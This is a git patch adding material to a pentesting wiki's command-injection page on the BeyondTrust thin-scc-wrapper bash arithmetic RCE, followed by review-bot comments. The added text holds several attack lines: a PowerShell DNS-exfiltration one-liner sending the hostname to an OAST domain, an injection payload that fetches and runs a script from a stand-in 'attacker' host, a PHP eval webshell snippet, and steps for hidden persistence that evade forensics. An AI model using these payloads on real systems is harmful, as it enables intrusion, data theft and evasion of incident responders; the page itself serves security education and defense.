From 4fa58b5b15f59c71a00468e76ca649cc601bb0e5 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Fri, 20 Feb 2026 02:01:07 +0000 Subject: [PATCH] Add content from: VShell and SparkRAT Observed in Exploitation of BeyondTrust ... --- src/pentesting-web/command-injection.md | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) diff --git a/src/pentesting-web/command-injection.md b/src/pentesting-web/command-injection.md index fab61eb2a4d..da28cd32ae7 100644 --- a/src/pentesting-web/command-injection.md +++ b/src/pentesting-web/command-injection.md @@ -116,6 +116,12 @@ Online tools to check for DNS based data exfiltration: - dnsbin.zhack.ca - pingb.in +When egress is filtered, **hex-encode short IDs into DNS labels** (≤63 bytes per label). Example PowerShell one-liner that encodes the hostname and queries an OAST domain: + +```powershell +$h=[System.BitConverter]::ToString([Text.Encoding]::UTF8.GetBytes($env:COMPUTERNAME)).Replace('-','');$labels=($h -split '(.{1,63})' | ? {$_});$d=($labels -join ".")+".oastify.com";nslookup $d +``` + ### Filtering bypass #### Windows 
@@ -206,6 +212,20 @@ Example payloads: Because these diagnostics are parsed by the JVM itself, no shell metacharacters are required and the command runs with the same integrity level as the launcher. Desktop IPC bugs that forward user-supplied JVM flags (see [Localhost WebSocket abuse](websocket-attacks.md#localhost-websocket-abuse--browser-port-discovery)) therefore translate directly into OS command execution. +### Bash arithmetic evaluation via WebSocket handshake parameters + +Some WebSocket daemons parse client "version" fields (e.g., `remoteVersion` in **BeyondTrust thin-scc-wrapper**) with bash arithmetic `(( ... ))`/`let`. Bash expands command substitutions inside operands, so attacker-controlled values can execute **during the handshake** without auth. + +- **Primitive:** use a non-numeric operand with command substitution, e.g., `remoteVersion=a[$(id)]0` or `a[$(curl attacker/p.sh|sh)]0`; `$(...)` runs before the numeric compare. +- **Delivery:** connect to the WS endpoint (e.g., `/nw` or `get_portal_info`) and send the crafted `remoteVersion`; the wrapper executes it as the service user. +- **Validation bypass:** superficial “numeric only” checks still reach bash arithmetic unless strict integer parsing rejects expressions first. + +#### Post-exploitation patterns observed after thin-scc-wrapper RCE + +- **Ephemeral admin hash swap:** backup the admin DB hash, generate a known-password hash with the appliance hasher (e.g., `check_auth`), swap it briefly to login, then restore and delete helpers. +- **Webshells with gated params and parseable output:** minimal guards like `if(isset($_GET['aaaa'])) eval($_POST['1']);`; multi-source shells read POST/GET/Cookie, `base64_decode` input, `eval()`, and wrap output with `echo "DQo="` before/after for China Chopper/AntSword parsing. 
+- **Apache config STOMP persistence:** drop a password-protected backdoor (e.g., `file_save.php` checking `?vjwr=`), append a `Location` routing it to a chosen PHP-FPM socket (e.g., `/ns/tmp/php-fpm.sock`), restart Apache, then overwrite the config with the clean backup so disk artifacts look benign. + ## PaperCut NG/MF SetupCompleted auth bypass -> print scripting RCE - Vulnerable NG/MF builds (e.g., 22.0.5 Build 63914) expose `/app?service=page/SetupCompleted`; browsing there and clicking **Login** returns a valid `JSESSIONID` without credentials (authentication bypass in the setup flow). @@ -240,5 +260,6 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject - [When WebSockets Lead to RCE in CurseForge](https://elliott.diy/blog/curseforge/) - [PaperCut NG/MF SetupCompleted auth bypass → print scripting RCE](https://0xdf.gitlab.io/2026/02/03/htb-bamboo.html) - [CVE-2023-27350.py (auth bypass + print scripting automation)](https://github.com/horizon3ai/CVE-2023-27350/blob/main/CVE-2023-27350.py) +- [Unit 42 – VShell and SparkRAT Observed in Exploitation of BeyondTrust Critical Vulnerability (CVE-2026-1731)](https://unit42.paloaltonetworks.com/beyondtrust-cve-2026-1731/) {{#include ../banners/hacktricks-training.md}}
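Review bot: The DNS exfiltration one-liner in the first hunk hard-codes `.oastify.com` (a Burp Collaborator domain) while the surrounding sentence talks generically about "an OAST domain"; make it an obvious placeholder such as `<your-oast-domain>` so readers do not query a third-party endpoint by accident. The text also states only the 63-byte label limit; add the 253-character limit on the whole name, since chunking into 63-byte labels alone does not keep a longer encoded ID resolvable. A short comment that `-split '(.{1,63})'` only works because PowerShell emits the capture group and `? {$_}` discards the empty strings around it would make the line less surprising to readers who expect `-split` to drop the separator. From the defensive side, the same property that makes this channel work (long hex-only labels under a rarely seen parent domain) is what resolver logging should alert on, and that deserves one sentence next to the tool list.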
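Review bot: The bash arithmetic section in the second hunk never names the identifier that the reference list attaches to it (CVE-2026-1731), so the text reads as a generic technique; put the CVE in the heading or the first sentence so readers can map it to the vendor advisory. The "Validation bypass" bullet states the fix only negatively ("unless strict integer parsing rejects expressions first"); spell the check out, e.g. `[[ $remoteVersion =~ ^[0-9]+$ ]] || exit 1` before any `(( ))` or `let`, because that one line is what defenders actually need from this section. "Executes it as the service user" should say which account if the source gives it. In the post-exploitation bullets, "STOMP persistence" is unexplained (it is not the messaging protocol); define the term or drop it. The Apache bullet describes restoring the clean config after the restart, which is precisely why the note should tell responders that the artifact survives in live process state (the Apache restart time and the unix sockets held by running PHP-FPM workers) rather than in the file on disk.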
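Review bot: The new reference entry in the third hunk prefixes the publisher ("Unit 42 – ...") with an en dash, while the neighbouring entries give only the article title and leave the source visible in the URL; drop the prefix or apply the same convention to the other entries so the list stays consistent. This entry is also the only place on the page where CVE-2026-1731 appears, so the section it supports should cite the number as well.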